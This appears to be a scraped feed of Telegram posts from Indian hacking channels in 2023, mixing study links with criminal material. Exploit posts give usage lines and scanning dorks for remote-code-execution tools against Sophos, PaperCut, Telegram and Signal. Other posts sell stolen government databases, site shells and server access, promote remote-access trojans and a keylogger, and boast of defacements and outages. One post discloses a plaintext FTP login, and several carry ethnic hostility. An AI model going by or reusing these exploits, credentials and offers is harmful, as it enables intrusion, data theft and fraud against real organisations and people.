𝙈𝙖𝙨𝙨 𝙃𝙪𝙣𝙩𝙞𝙣𝙜 𝘽𝙡𝙞𝙣𝙙 𝙓𝙎𝙎. 𝙇𝙞𝙣𝙠: https://twitter.com/thecybertix/status/1654025276123406337?t=L9suAy2ju68fLaCOFPiOjg&s=19
2023-05-04 06:11:45
Join krlo guys https://t.me/Byte_Updates
2023-05-04 05:02:23
WhatsApp OSINT ToolLogs online/offline events from ANYONE in the world.
2023-05-04 04:58:13
DNSReconDnsrecon is one of the popular scripts in the security community which is used for reconnaissance on domains. This script is written in python language.This script checks all the DNS records for AXFR which can be useful for a security researcher for DNS enumeration on all types of records such as SOA, NS, TXT, SVR, SPF, etc.
2023-05-03 22:30:53
https://system32.ink/make-your-machines-static-address-port-forwarding-without-router-static-address/
2023-05-03 15:51:10
Telegram-0day-exploit-pocZero Day revshell exploit tool for Remote Code Execution vulnerability found in Telegram's bot api broadcast_msg api call.Usage:python poc.py -u [TELEGRAM USER] -i [IP HERE] -p [PORT HERE]Download: https://system32.ink/news-feed/p/334/
2023-05-03 15:48:22
Signal-zeroday-exploitSignal RCE vulnerability found in contact exchange APIUsage:python poc.py -t [TARGET PHONE #] -i [IP HERE] -p [PORT HERE]Download: https://system32.ink/news-feed/p/333/
2023-05-03 04:45:44
𝘼𝙪𝙩𝙝𝙚𝙣𝙩𝙞𝙘𝙖𝙩𝙞𝙤𝙣 𝙫𝙨 𝘼𝙪𝙩𝙝𝙤𝙧𝙞𝙯𝙖𝙩𝙞𝙤𝙣𝙇𝙞𝙣𝙠: https://youtube.com/shorts/RFFDrICrAXc?feature=𝙨𝙝𝙖𝙧𝙚𝙎𝙪𝙗𝙨𝙘𝙧𝙞𝙗𝙚 𝙩𝙤 𝙤𝙪𝙧 𝙔𝙤𝙪𝙏𝙪𝙗𝙚 𝙘𝙝𝙖𝙣𝙣𝙚𝙡 𝙛𝙤𝙧 𝙢𝙤𝙧𝙚 𝙪𝙥𝙘𝙤𝙢𝙞𝙣𝙜 𝘾𝙮𝙗𝙚𝙧 𝙎𝙚𝙘𝙪𝙧𝙞𝙩𝙮 𝙑𝙞𝙙𝙚𝙤𝙨 🙏
2023-05-01 04:48:57
PASS : INDIAISYOURDADGreetz to All Indian Hackers Jai Hind 🇮🇳@BlackDragonSec
2023-05-01 04:47:46
𝘽𝙪𝙜 𝙏𝙮𝙥𝙚 : Reflected XSS𝙋𝙡𝙚𝙖𝙨𝙚 𝙨𝙪𝙗𝙨𝙘𝙧𝙞𝙗𝙚 𝙩𝙤 𝙤𝙪𝙧 𝙔𝙤𝙪𝙏𝙪𝙗𝙚 𝙘𝙝𝙖𝙣𝙣𝙚𝙡🙏𝘾𝙤𝙪𝙧𝙨𝙚 𝙇𝙞𝙣𝙠: https://youtu.be/NOmEO5GsS7w☺️🙌
2023-04-30 01:19:36
Trap , brainwash And Transform
2023-04-29 12:03:29
MITM (MAN-IN-THE-MIDDLE) ATTACK PROPAGATION :- ETTERCAP & BeEF FRAMEWORKForum post :- HereBy @Devil_AnonO.s :- LinuxTools used :- Ettercap & BeEfWhat is a MITM ATTACK❔A man-in-the-middle (MiTM) attack is a type of cyber attack in which the attacker secretly intercepts and relays messages between two parties who believe they are communicating directly with each other. The attack is a type of eavesdropping in which the attacker intercepts and then controls the entire conversation. share➡️ and promote✅@cyberhellcommunity
2023-04-29 07:50:11
Watch latest movies and Get Free Courses on https://neplix.streamFeatures of Neplix1. Free Movies2. Less Ads3. Free Courses4. Request for Movieshttps://neplix.stream/courses
2023-04-28 18:25:20
https://medium.com/@lonewarriorco/mastering-osint-the-ultimate-guide-to-investigating-and-analyzing-publicly-available-information-370f265699daIn this blog I have mentioned:-1.What truly osint stands for2. Difference between Digital Forensics and OSint3. The correct approach for osint4. Place to learn the techniques of OSint5. Jobs where osint is used as a skillThis may be helpful for both intermediate and beginners.also suggest me for any edits.
2023-04-28 14:55:34
Public This Mother Fucker 🖕 Images
2023-04-28 14:55:25
❗️Scammer 🚫@MohammedKairz Images Images Images
2023-04-28 14:55:13
😄 312 Turkish Passports Leaked By 🇪🇸 @LegionLeaker 🇪🇸 Images
2023-04-28 10:34:38
https://system32.ink/system32-byte-9/
2023-04-28 09:24:37
DHCP Server Service Remote Code Execution VulnerabilityCVE-2023-28231 POC Download
2023-04-28 07:12:13
Opportunity Update : We are in search of Talented Guys who have skillset of : Making Crypters : Making FUD Trojans : Doing Reverse Engineering : Making Decompilers Dm or send your Resume to Infosecpawan@gmail.com asap .________INDIANS ONLY...
2023-04-27 16:25:23
🛡 𝘾𝙡𝙞𝙘𝙠𝙟𝙖𝙘𝙠𝙞𝙣𝙜 & 𝘾𝙤𝙣𝙩𝙚𝙣𝙩 𝙄𝙣𝙟𝙚𝙘𝙩𝙞𝙤𝙣 𝙑𝙪𝙡𝙣𝙚𝙧𝙖𝙗𝙞𝙡𝙞𝙩𝙮 🛡Clickjacking Tool, Script are given in Description. 𝙋𝙡𝙚𝙖𝙨𝙚 𝙇𝙞𝙠𝙚 & 𝙎𝙪𝙗𝙨𝙘𝙧𝙞𝙗𝙚 𝙩𝙤 𝙤𝙪𝙧 𝙔𝙤𝙪𝙏𝙪𝙗𝙚 𝙘𝙝𝙖𝙣𝙣𝙚𝙡🙏𝙇𝙞𝙣𝙠 : https://youtu.be/gbpVPv3aT18
2023-04-27 11:46:50
https://thexssrat.podia.com/pentesting-101-the-ultimate-guide-from-start-to-finish-from-planning-to-reporting?coupon=CSDFVFDSFGDSF
2023-04-27 11:23:43
private sector database ✪1 week  10$2 week 20$1 month 50$ https://t.me/+V3GiW-cRaMswMTM9@Algorithm2bot
2023-04-27 08:22:16
https://www.mcracker.org/2021/12/raasnet-make-ransomeware-for.html
2023-04-27 06:13:28
𝘽𝙪𝙜 𝙏𝙮𝙥𝙚: No Rate Limit𝙇𝙞𝙣𝙠: https://youtube.com/shorts/DKHYV6sjYXQ?feature=share𝙋𝙡𝙚𝙖𝙨𝙚 𝙨𝙪𝙗𝙨𝙘𝙧𝙞𝙗𝙚 𝙩𝙤 𝙤𝙪𝙧 𝙔𝙤𝙪𝙏𝙪𝙗𝙚 𝙘𝙝𝙖𝙣𝙣𝙚𝙡🙏
2023-04-27 01:43:08
ComboList Wordpress Fucker(BETA Version) 🖕
2023-04-26 16:03:59
https://system32.ink/buffer-overflow-to-rce-root-shell/
2023-04-26 15:29:20
Come On Vc https://t.me/cyberdemonsindiaa?videochat=51b2c0986fb99bde74
2023-04-26 09:51:59
This movie will open the eyes of millions of Hindu girls.#TheKeralaStory
2023-04-25 17:05:06
https://hacklido.com/blog/385-cve-2023-23525-get-root-via-a-fake-installer
2023-04-25 15:30:54
https://qualysec.com/pentester-intern/
2023-04-25 13:20:15
CVE-2023-1671 | Pre-Auth RCE in Sophos Web ApplianceDorkfofa(title="Sophos Web Appliance" || app="Sophos-Web-Appliance") && title!="Sophos Web Appliance:错误请求"ZoomEyetitle:"Sophos Web Appliance"-title:"Sophos Web Appliance: Forbidden"-title:"Sophos Web Appliance: Bad Request"Shodantitle:"Sophos Web Appliance"Usage:python CVE-2023-1671-POC.py -u http://www.example.compython CVE-2023-1671-POC.py -u http://www.example.com -d xxxxxx.dnslog.cnpython CVE-2023-1671-POC.py -f urls.txtpython CVE-2023-1671-POC.py -f urls.txt -d xxxxxx.dnslog.cnDownload: https://system32.ink/news-feed/p/309/
2023-04-25 11:58:18
CVE-2023-27524: Apache Superset Auth Bypass💥 Script to check if an Apache Superset server is running with an insecure default configuration (CVE-2023-27524). The script checks if a Superset server's session cookies are signed with any well-known default Flask SECRET_KEYs.The --validate flag can be used to validate exploitability by enumerating databases using the Superset API.requirements:flask-unsign==1.2.0requests==2.26.0Usage:CVE-2023-27524.py [-h] --url URL [--id ID] [--validate] [--timeout TIMEOUT]Download: https://system32.ink/news-feed/p/308/
2023-04-25 11:53:23
https://t.me/An0nymous141
2023-04-25 11:08:53
https://trickypenguin.ink/cross-site-scripting/
2023-04-25 10:32:20
https://secops.group/certifications/certified-cloud-security-practitioner-aws-ccsp-aws/100% OFF Coupon : CCSP-AWS-VNM-100Certified Cloud Security Practitioner–AWS(CCSP-AWS) £100.00AWS-CCSP 100% OFF Exam by The SecOps Group📢Want a 100% discount code on our newly launchedCertified Cloud Security Practitioner - AWS (CCSP-AWS) exam?
2023-04-25 08:09:49
httpXXX://147.182.180.78:8081/CraxsRat-Linuxndroid/#CraxsRAT #CypherRAT Images
2023-04-24 16:08:35
Difference between IPv4 and IPv6⛨ Follow : @HackingInsights
2023-04-24 14:06:38
"Pakistani Army don't have capacity to fight India. Our Tanks can't move, we have no fuel"Pakistani journalist Hamid Mir makes sensational revelations in TV interview, says Gen Bajwa justified surrender on Kashmir, said Pak had no fuel for her battle tanks. Bajwa also said, Pakistan Army can't fight India.
2023-04-24 11:59:19
🆘 INTEL 🆘Anti-Indian hackers are into claims to have hacked major Indian government organizations in various Telegram and Social Media Groups, but they seem to lack the actual hacking skills to do so. Nonetheless, Individuals associated with these govt organizations remain vulnerable to being hacked if they download samples containing third-Grade hacking applications from the posts of these hackers. These samples are deliberately designed to compromise the security of the government organizations when samples are opened.This is strongly advised that the samples of organisation should not be downloaded by any individual of any organisations. भारत-विरोधी हैकर विभिन्न टेलीग्राम और सोशल मीडिया समूहों में प्रमुख सरकारी संगठनों को हैक करने का दावा करते हैं, लेकिन ऐसा करने के लिए उनके पास वास्तविक हैकिंग कौशल की कमी है। बहरहाल, इन सरकारी संगठनों से जुड़े व्यक्ति हैक होने की चपेट में रहते हैं, अगर वे इन हैकर्स के सोशल मीडिया पोस्ट से थर्ड-ग्रेड हैकिंग एप्लिकेशन वाले नमूने डाउनलोड करते हैं सैंपल के नाम पर।डेटा-नमूने खोले जाने पर इन नमूना डेटा को जानबूझकर सरकारी संगठनों की सुरक्षा से समझौता करने के लिए डिज़ाइन किया गया है।यह दृढ़ता से सलाह दी जाती है कि नकली हैकर संगठन के डेटा नमूने किसी भी भारतीय संगठन के किसी भी व्यक्ति द्वारा डाउनलोड नहीं किए जाने चाहिए।Kid's will be kiddo only, Grow up kiddo's & learn Hacking.
2023-04-24 11:44:06
💥 This PoC for CVE-2023-27350 uses an authentication bypass vulnerability chained with abuse of builtin scripting functionality to execute code.Usage:python3 CVE-2023-27350.py --url 'http://10.0.40.56:9191' --command calc.exeDownload: https://system32.ink/news-feed/p/307/
2023-04-24 10:55:30
Pentagon papers
2023-04-24 07:10:13
INTRODUCTION TO OSI REFERENCE MODEL 👽 FOR BEGINNERS NETWORKING PART 3WITH QUIZ AAJ RAAT 7:30 PR🔥THODE BAHUT OR TOPIC HAI JINKE BARE ME DISCUSS KRENGEBY - @localhost12hackat - @cyberdemonsindiaaJAY SHREE RAAM 🥰
2023-04-24 05:49:02
😮‍💨 Sale full access to database sitehttps://tangerangselatankota.go.idIn case of purchase, access to database is also given 😮‍💨 🗄🗄🗄🗄🗄🗄🗄🗄🗄🗄🗄🗄➡️ username,realname,password,telephon🔵 Total database :5,202 💰Price:200$Payment : BTC 🪙 , ETH 🪙 , USDT 🪙📱For Buy @Hajit00n🗄🗄🗄🗄🗄🗄🗄🗄🗄🗄🗄🗄 Images
2023-04-24 04:51:18
𝐑𝐞𝐠𝐢𝐬𝐭𝐞𝐫 𝐍𝐨𝐰👉 ┃ private sector database ✪📌  private channel sharing monetary 📌 private  and free  tools in the field of hacking 📌  crack 📌  carding  📌  combo 📌 account 📌  config 📌leecher📌 king of database allrounder 📌 logs courses📌 👍😁private sector database ✪1 week  10$2 week 20$1 month 50$Life time 100$payment method only btc and upiEscrow accepted@INDIANOSINT
2023-04-24 04:42:53
JOIN : @cyberdemonsDDL FOR LIBRARY MATERIAL
2023-04-23 09:53:34
Here is a suprise for you all!I'm going to share premium courses of geeks for geeks, coding ninjas and others for free in my second channel as if I'll share here then due to copyright issues this channel will get deleted by telegram.Join if you want premium courses for free https://t.me/+UMXZkXyfrUthMTM1
2023-04-22 09:05:13
Best channel for free hacking tools. There's also a private channel for more advanced tools.😎just dm the admin @pwng0dhttps://t.me/hackerhubtools
2023-04-21 08:09:02
*Jinhe voucher buy krna ho eLearnSecurity ka wo abhi kr lena with $100 discount*Voucher Code Post Me Mil Jayegahttps://www.linkedin.com/posts/technicalnavigator_elearnsecurity-offer-discount-activity-7054836954454011904-GcwZ?utm_source=share&utm_medium=member_ios#hacker_bano_chutiya_nhe 😊😊
2023-04-21 05:47:59
For those who are feeling low, listen this🔥
2023-04-21 03:19:18
Learn SQL from Squid Game!An interesting way to learn SQL 🤩⛨ Follow : @HackingInsights
2023-04-20 16:09:04
New video is out check it out 👇🏻https://youtu.be/O_NJjEhZX64
2023-04-20 07:33:20
History of Coding Language⛨ Follow : @HackingInsights Images
2023-04-20 00:09:02
https://check-host.net/check-http?host=https://www.islamabadairport.com.pk&csrf_token=40c9e9bfc0cb4f4b15fa9fb5ab0762e2d2900967Islamabad airport web is currently offline!!Credits to @keralacyberxtratorsFu*ked by your own daddy-India!And remember what are you before make fun of some one and dont say that these websites are only available in Pakistan and all other ips are blocked💀😂Haha🤣let's seee😏#UnitedByOneDividedByZero#UnitedIndianHackers#TEAM_ANON_101#IndianCyberForce#DarknetAssociation#KeralaCyberXtractors#NewWorldHactivist#IndianCyberMafia#BlackDragonSecurity#IndianCyberTroops#AnonymousIndia#IndianCyberPwnage#UnknownCyberCult
2023-04-19 02:50:05
👉CAN A.I HELP HACKERS TO INCREASE THE CYBERSECURITY THREATS??👈⭕️  (AI)-driven ChatGPT is being used by cyber criminals to develop malicious tools that can steal your data, a report has warned. ⭕️  The first such instances of cybercriminals using ChatGPT to write malicious codes have been spotted by Check Point Research (CPR) researchers.⭕️  In underground hacking forums, threat actors are creating "info stealers", and encryption tools and facilitating fraud activity. ⭕️  The researchers warned of the fast-growing interest in ChatGPT by cybercriminals to scale malicious activity. ⭕️  "Cybercriminals are finding ChatGPT attractive. Hackers starting to use it to write malicious code. ⭕️  ChatGPT has the potential to speed up the process for hackers by giving them a good starting point.⭕️  Do you think Artifical Intelligence can be a threat for human beings??⛨ Follow : @HackingInsights
2023-04-18 19:58:57
g's hacker's ( its a bad day for me but —❤️ ‼️Here we go again FORENSIC Log-based Detection of keystroke injection BadUSB Attacks 💕this is a malware Defence paper for USB attacks like 'ruberducky',As always #hacker_bano_chutiya_nhe 🐆🐆
2023-04-18 16:30:32
https://system32.ink/tricks-you-must-know-in-offensive-cyber-security/
2023-04-18 11:58:50
🧑‍💻 Legion Wp-login Combo Cracker 😈😏 Crack Wordpress login Very Fast 💰 Price : 100$👉 DM Buy @Hajit00n
2023-04-18 11:58:38
😈 County Government of Kirinyaga HACKED! 😈 😁:https://kirinyaga.go.ke/🤚:https://zone-hc.org/archive/mirror/549https://zone-h.org/mirror/id/40571730 Images Images
2023-04-18 11:58:31
💎Government😈 (Mexico)Electoral Court of the State of Guerrero HACKED! 😈 😁:https://teegro.gob.mx/Ir.html🤚:http://www.zone-h.org/mirror/id/40571906sell Access: @Hajit00n Images
2023-04-18 11:58:24
💎Government⭐️😈 Otuzco Provincial Municipality HACKED! 😈 😁:http://muniotuzco.gob.pe/portalantiguo/ 🤚 Images
2023-04-18 11:58:09
💎 Government😈 Ombudsman of the City of Tandil HACKED! 😈 😁:https://defensoriadelpueblotandil.gob.ar/Ir.html💸 Price : 150$🛒 Payment : BTC , ETH , USDT , TRON 🧑‍💻 Buy Shell : @Hajit00n Images
2023-04-18 06:56:54
15 Best Ethical Hacking Tools 🧰 • Wireshark• NMAP• Burp Suite• Metasploit• Nikto• Intruder• Aircrack-Ng• Nessus• Acunetix• SQLMap• Angry IP Scanner• QualysGuard• Invicti• OpenVAS• ettercap⛨ Follow : @HackingInsights
2023-04-17 15:05:48
GUYS 🔥🔥TOP 3 LAPTOPS UNDER 60000 FOR CODERS , HACKERS, AND GAMERS VIDEO IS LIVE NOW , GO AND WATCH THAT VIDEO BY JUST FOLLOWING THREE STEPS : STEP 1 = GO TO YOUR YOUTUBE APK , STEP 2 = SEARCH CYBER DEMONS INDIA , STEP 3 = ENJOY THE VIDEO LISTED ON MY CHANNEL , OR FOLLOW THIS LINK BELOW : https://www.youtube.com/@CYBERDEMONSINDIA || BUT PLS UPAR WALA RASTA APNAOGE TO HELP HOJAYEGI | LIKE AND SUBSCRIBE JRUR KRDENA🙈🥳😘🔥❤️
2023-04-17 13:28:38
Free Web Application Pentesting Tools• Cyver Core • Zed Attack Proxy• W3af• Arachni• Wapiti• Metasploit• Vega• Grabber• SQLMap• Ratproxy • Wfuzz⛨ Follow : @HackingInsights
2023-04-17 11:36:48
COBALT STRIKE :- WINDOWS💻 POST EXPLOITATION⚡️By @Devil_AnonO.s :- Kali 💻Tool (Official website) :- CobaltstrikeTool :- C¥B€R H€LL PVT MembersWhat is windows post exploitation ❔Windows Post-exploitation refers to any actions taken after a session is opened. A session is an open shell from a successful exploit or bruteforce attack. A shell can be a standard shell or Meterpreter. Share➡️ and support😀@cyberhellcommunity
2023-04-17 11:19:12
Studying Active Directory?Here are 5 blogs you should definitely check out.1. https://lnkd.in/geyHTm_82. https://lnkd.in/g87pewRe3. https://adsecurity.org/4. https://dirkjanm.io/5. https://lnkd.in/gcwsw-Nf#pentesting #ethicalhacking #learningeveryday #infosec #cybersec #activedirectory
2023-04-17 11:18:36
Here are some of the free websites to learn Linux from for free :1. OverTheWire[https://lnkd.in/eFKK_85m]2. Linux Journey[https://linuxjourney.com/]3. Linux Handbook[https://linuxhandbook.com/]4. Tecmint[https://www.tecmint.com/]5. Linux Hint[https://linuxhint.com/]6. LinuxOPsys[https://linuxopsys.com/]7. Linuxize[https://linuxize.com/]8. Eduonix Learn Linux From Scratch[https://lnkd.in/e7cHemyy]9. Cyberciti Bash Shell Scripting Tutorial[https://lnkd.in/eNn5_9Gv]10. Learn Enough Command Line To Be Dangerous[https://lnkd.in/eZimTYA4]11. The Debian Administrator's Handbook[https://lnkd.in/exZzEwFS]12. LabEx Linux For Noobs[https://lnkd.in/e_FPpdtz]13. nixCraft[https://www.cyberciti.biz/]14. Conquering the Command Line[https://lnkd.in/eHSc8Sza]15. FOSS Linux[https://www.fosslinux.com/]16. It's FOSS[https://itsfoss.com/]17. Linux Survival[https://linuxsurvival.com/]18. Ryan's Tutorials[https://lnkd.in/ePGx5PaC]19. TLDP Advanced Bash Scripting Guide[https://lnkd.in/e4nzZmvV]20. Guru99 Linux Tutorial Summary[https://lnkd.in/ebeJuzq8]#pentesting #ethicalhacking #cybersecurity #learningeveryday #infosec #cybersec
2023-04-17 11:15:43
Here is an updated list of free cybersecurity certifications you can get to kickstart your career in cybersecurity :1. Introduction to Cybersecurity[https://lnkd.in/gS4ncPmX]2. Cybersecurity Essentials[https://lnkd.in/gSQqNY9h]3. Introduction to Dark Web, Anonymity, and Cryptocurrency[https://lnkd.in/g8FSgRtH]4. Ethical Hacking Essentials (EHE)[https://lnkd.in/gG4RgHA9]5. Networking Essentials[https://lnkd.in/g6JMDGGe]6. Website Hacking Techniques[https://lnkd.in/gUdjnpRW]7. Digital Forensics Essentials (DFE)[https://lnkd.in/gkMpN--B]8. Network Defense Essentials (NDE)[https://lnkd.in/gnvw7Fiy]9. Android Bug Bounty Hunting: Hunt Like a Rat[https://lnkd.in/g76Jnzmi]10. Certified in Cybersecurity℠ - CC[https://lnkd.in/gB2fGdfC]11. 20+ Free AWS Certs Related to Cybersecurity[https://lnkd.in/gfsqsQKz]12. Cyber crime:[https://lnkd.in/gdiS-pqK]13. Cyber Forensics:[https://lnkd.in/g22nfYaN]14. Network Security:[https://lnkd.in/gXB4nTx5]#infosec #cybersecurity #pentesting #ethicalhacking #informationsecurity #learningeveryday #networksecurity
2023-04-16 18:08:20
🕉️ DogeRat Premium Subscription Available 🕉️⭐ New Features ⭐🕉️ Screenshot🕉️ Keylogger🕉️ Gallery🕉️ Clipboard🕉️New File Manager -------------------------And many features,check in video 🕉️ New features Added🕉️ Bug fixed🕉️ Persistence (work after removing from background or restarting the phone🕉️ Smooth connection client to Bot🙏 @shivaya_dav
2023-04-16 01:22:38
None
2023-04-15 17:56:06
SALEIndonesian X company's Windows Servers For sale (Only In Indian 2 Rupee & ONLY for India govt ID holders & Australian Defence Personals)- FULL COMPANY ACCESS. (You can co-relate brand to TOYOTA)- Network Access to Equivalent Departments & joint ventures.- A Separate Application Framework to Bind your Exploits into company APK, IPA Applications, You Can release the malformed application for Indonesian public from servers anytime in few seconds.- Guarantee of Persistence access, even buyers loose the access upto 5years. Only in 2 Rupee, Interested ones can email at Pakistan's ex foreign minister work email fop.portalteam@gmail.com, I will receive your Request. Regards pkg
2023-04-15 17:30:23
https://system32.ink/system32-byte-8/
2023-04-15 17:26:24
Old but gold (beginners)https://www.mcracker.org/2021/01/how-to-hack-facebook-account-this.html
2023-04-15 14:33:20
💥Chrome actively exploited 0-day vulnerability (CVE-2023-2033: type confusion in V8 engine, here fix)🤙Thx @hosselot Images
2023-04-15 13:01:00
🛒Sale government website databasehttps://bpjs-kesehatan.go.idNumber of 800 thousand database columns🛒 Payment : BTC , ETH , USDT 🛒 For Buy: @Hajit00n Images Images Images Images Images
2023-04-15 12:43:17
✅ FOR SALE ✅💎 Paser District Government Official Portal➡️paserkab.go.id➡️sekda.paserkab.go.id➡️bappedalitbang.paserkab.go.id➡️sipapa.bappedalitbang.paserkab.go.id💰 Price : 100$🛒 Payment : BTC , ETH , USDT 🛒 For Buy: @Hajit00n
2023-04-14 20:01:08
https://system32.ink/services-tools-wiki/
2023-04-14 15:29:38
None
2023-04-14 08:00:24
⭐️ Shodan Search Engine Account For Sell 📐 number of available accounts is 10$350 per month on the site itself price of each account is $100We sell 10 accounts for only $500🧑‍💻 For Buy DM @Hajit00n Images Images
2023-04-14 06:27:57
🔟 Python certifications to boost your resume in 2023𝟭. 𝗜𝗻𝘁𝗿𝗼 𝘁𝗼 𝗣𝘆𝘁𝗵𝗼𝗻This a great course to get started with learning Python, if you have no coding experience.👉 https://kaggle.com/learn/intro-to-programming𝟮. 𝗣𝘆𝘁𝗵𝗼𝗻 𝗣𝗿𝗼𝗴𝗿𝗮𝗺𝗺𝗶𝗻𝗴 𝗰𝗼𝘂𝗿𝘀𝗲Learn the fundamentals like functions, loops, conditional statements, etc of the most important language for data science.👉 https://kaggle.com/learn/python𝟯. 𝗣𝗿𝗼𝗴𝗿𝗮𝗺𝗺𝗶𝗻𝗴 𝗘𝘀𝘀𝗲𝗻𝘁𝗶𝗮𝗹𝘀 𝗶𝗻 𝗣𝘆𝘁𝗵𝗼𝗻Part 1 prepares you for PCEP – Certified Entry-Level Python Programmer Certification.Part 2 prepares you for PCAP – Certified Associate in Python Programming Certification.👉 https://netacad.com/courses/programming/pcap-programming-essentials-python𝟰. Python Data Structure and Algorithms👉 https://t.me/HackingInsights/520𝟱. 𝗦𝗰𝗶𝗲𝗻𝘁𝗶𝗳𝗶𝗰 𝗖𝗼𝗺𝗽𝘂𝘁𝗶𝗻𝗴 𝘄𝗶𝘁𝗵 𝗣𝘆𝘁𝗵𝗼𝗻You'll learn Python fundamentals like variables, loops, conditionals, and functions. Then you'll quickly ramp up to complex data structures, networking, relational databases, and data visualization.👉 https://freecodecamp.org/learn/scientific-computing-with-python/𝟲. 𝗗𝗮𝘁𝗮 𝗔𝗻𝗮𝗹𝘆𝘀𝗶𝘀 𝘄𝗶𝘁𝗵 𝗣𝘆𝘁𝗵𝗼𝗻You'll learn how to read data from sources like CSVs and SQL, and how to use libraries like Numpy, Pandas, Matplotlib, and Seaborn to process and visualize data.👉 https://freecodecamp.org/learn/data-analysis-with-python/𝟳. 𝗗𝗮𝘁𝗮 𝗩𝗶𝘀𝘂𝗮𝗹𝗶𝘇𝗮𝘁𝗶𝗼𝗻 𝘄𝗶𝘁𝗵 𝗣𝘆𝘁𝗵𝗼𝗻You will learn how to implement the graphical representation of data in order to interactively and efficiently convey insights to clients, customers, and stakeholders in general.👉 https://cognitiveclass.ai/courses/data-visualization-python#about-course𝟴. 𝗠𝗮𝗰𝗵𝗶𝗻𝗲 𝗟𝗲𝗮𝗿𝗻𝗶𝗻𝗴 𝘄𝗶𝘁𝗵 𝗣𝘆𝘁𝗵𝗼𝗻You will build several neural networks and explore more advanced techniques like natural language processing and reinforcement learning.👉 https://freecodecamp.org/learn/machine-learning-with-python/9. Practice Python👉 https://learnpython.org/10. Free Python course by datacamp👉 https://campus.datacamp.com/courses/intro-to-python-for-data-science/chapter-1-python-basics?ex=1ENJOY LEARNING 👍👍          Join for more✖️ @HackingInsights ✖️
2023-04-13 13:46:08
How To Find deleted Youtube Videos:https://system32.ink/news-feed/p/298/
2023-04-13 12:10:17
Arey bhaijaan a Lahore ke electric ko kay hua. 🙂
2023-04-13 02:59:58
Porkiyo ko Do diya
2023-04-13 02:59:44
Afghans fighting Pakistanis in an Indian restaurant in England.Interestingly in UK..most restaurants with Indian Name are opened by Pakistanis.
2023-04-12 18:30:26
https://system32.ink/graphql-for-pentesters/
2023-04-12 17:04:35
https://www.youtube.com/channel/UCy6qA2hYl2VWPy_WlcFXFFQ GUYS NEW VIDEO AGYI HAI YOUTUBE PE JALDI JAKE DEKHLO PURI CHANNEL BHI SUBSCRIBE KRLENA🙈🙈❤️😍
2023-04-12 14:24:08
https://system32.ink/top-most-useful-pentesting-tools/
2023-04-12 12:48:16
🔫 2K Turkiye Goverment Login Access 🏴‍☠️ ✅ Payment BTC - ETH - USDT (trc20)👉 For Buy: @Hajit00n 👺 Images
2023-04-12 12:44:58
Fresh 3K Saudi Arabia Data For Sell 🔥👉 For Buy: @Hajit00n 👺https://prnt.sc/_KZd5jCl5FXA
2023-04-12 05:19:47
Bug Reports 🥬☘️ & Bug bounty Guide 🌿🎯🍀1)Attacker is able to query Github repositories of arbitrary Shopify Hydrogen Usershttps://hackerone.com/reports/16927882)The Story of Becoming a Super Adminhttps://medium.com/@omerkepenek/the-story-of-becoming-a-super-admin-ab32db7dd1b33)How to Bypass XSS Filters: A Practical Examplehttps://securitylit.medium.com/how-to-bypass-xss-filters-a-practical-example-3189877fe2ce4)XSS Vulnerability Typeshttps://medium.com/@rkarthik435/xss-vulnerability-types-272ae496d1a15)A Beginner’s Guide to Bug Hunting and Exploiting Common WordPress Vulnerabilitieshttps://medium.com/@cuncis/a-beginners-guide-to-bug-hunting-and-exploiting-common-wordpress-vulnerabilities-821fe0d794616)What Is Open Source Intelligence (OSINT) In the Context of Bug Bountyhttps://securitylit.medium.com/what-is-open-source-intelligence-osint-in-the-context-of-bug-bounty-c792f8680e3c7)Can you spot the vulnerability? #16022023 — Intigritihttps://infosecwriteups.com/can-you-spot-the-vulnerability-16022023-intigriti-a46068e557cc8)Skipjack Encryption: Understanding Its Advantages and Limitations in Cyber Security | 2023https://cyberw1ng.medium.com/skipjack-encryption-understanding-its-advantages-and-limitations-in-cyber-security-2023-b0dcfdf8cf6c9)Earning cryptocurrency through bug bountieshttps://medium.com/@apriltoken/earning-cryptocurrency-through-bug-bounties-718158b013ddBug Reports 🥬☘️ & Bug bounty Guide 🌿🎯🍀 ☝️☝️
2023-04-11 18:10:22
gg's hacker's ( good afternoon — ‼️Here we go again Certified PENetration Testing professional (CPENT) update link #hacker_bano_chutiya_nhe 💕
2023-04-11 14:28:49
⚡️Pakistan :-Blast in Balochistan, four killed including two policemen, 18 injured The blast occurred near a police vehicle parked in the Kandhari market in the Shahrah-e-Iqbal area of ​​the provincial capital Quetta.No group has claimed responsibility for the attack.🔺@AngrySaffron
2023-04-11 14:08:02
🇸🇪🇵🇰⚡️- Sweden has shut down its embassy in Pakistan permanentlyt.me/MEGHUPDATES
2023-04-11 13:35:01
👉BEWARE OF THESE FAKE INSTAGRAM JOB PAGES!!👈⭕️  In December, a job posting on Instagram piqued the woman’s interest. When she followed the link, she was taken to another Instagram account, @airlinejoballindia. She was instructed to fill out this form with her information, which included her contact details.⭕️  After she completed the form, she received a call from a man named Rahul. She was initially requested to pay a pittance of Rs 750 to register. However, as time went on, she was asked to send additional funds for gate pass fees, insurance, security deposits, and other expenses. ⭕️  The woman became concerned when the demand for money continued even after she sent Rs 8.6 lakh.⭕️  The woman’s husband then reported the incident to Central Delhi police. Following an investigation, authorities revealed that most money withdrawals were conducted in Hisar, Haryana. Rahul’s calls to the woman were also traced to the same address. After confirming all data, the police team raided and apprehended the fraudster.⭕️  The culprit admitted to investigators that he misled several people by promising them employment with private airlines. He began doing this when the perpetrator was jobless for more than two years due to the pandemic, as per a TOI report.          Join for more✖️ @HackingInsights ✖️
2023-04-11 13:02:31
Also Working In WIN 11 Without Detection
2023-04-11 12:49:30
Part2 Turkiye Goverment Access Added VIP💎https://prnt.sc/Uj8q2iP78VnT
2023-04-11 12:42:22
Turkiye Goverment Access Added VIP💎https://prnt.sc/BiaBeXmk4E3T
2023-04-11 07:03:57
https://system32.ink/setting-up-a-kali-linux-container/
2023-03-30 01:07:34
www.ist.edu.pk data above 👆
2023-03-30 01:07:33
None
2023-03-30 01:07:26
None
2023-03-30 01:07:08
None
2023-03-30 01:07:07
None
2023-03-30 01:07:06
None
2023-03-29 18:50:42
None
2023-03-29 17:21:58
Pakistan Ministry Of Defence have been robbed.Defence Deal of China-Pakistan for 20 J-10CE & 240 PL-15E Missiles is displayed for your reference.
2023-03-29 16:37:08
http://admin.sarco.com.pkhttp://pakistan.sarco.com.pkhttp://news.sarco.com.pkhttp://mail.sarco.com.pkhttp://sarco.com.pk
2023-03-29 14:24:24
FTP Username: pakistan@sarco.com.pkFTP server: ftp.sarco.com.pkFTP & explicit FTPS port: 21FTP pass : IndianCyberPwnage@w3b_1nj3c70r
2023-03-29 13:51:41
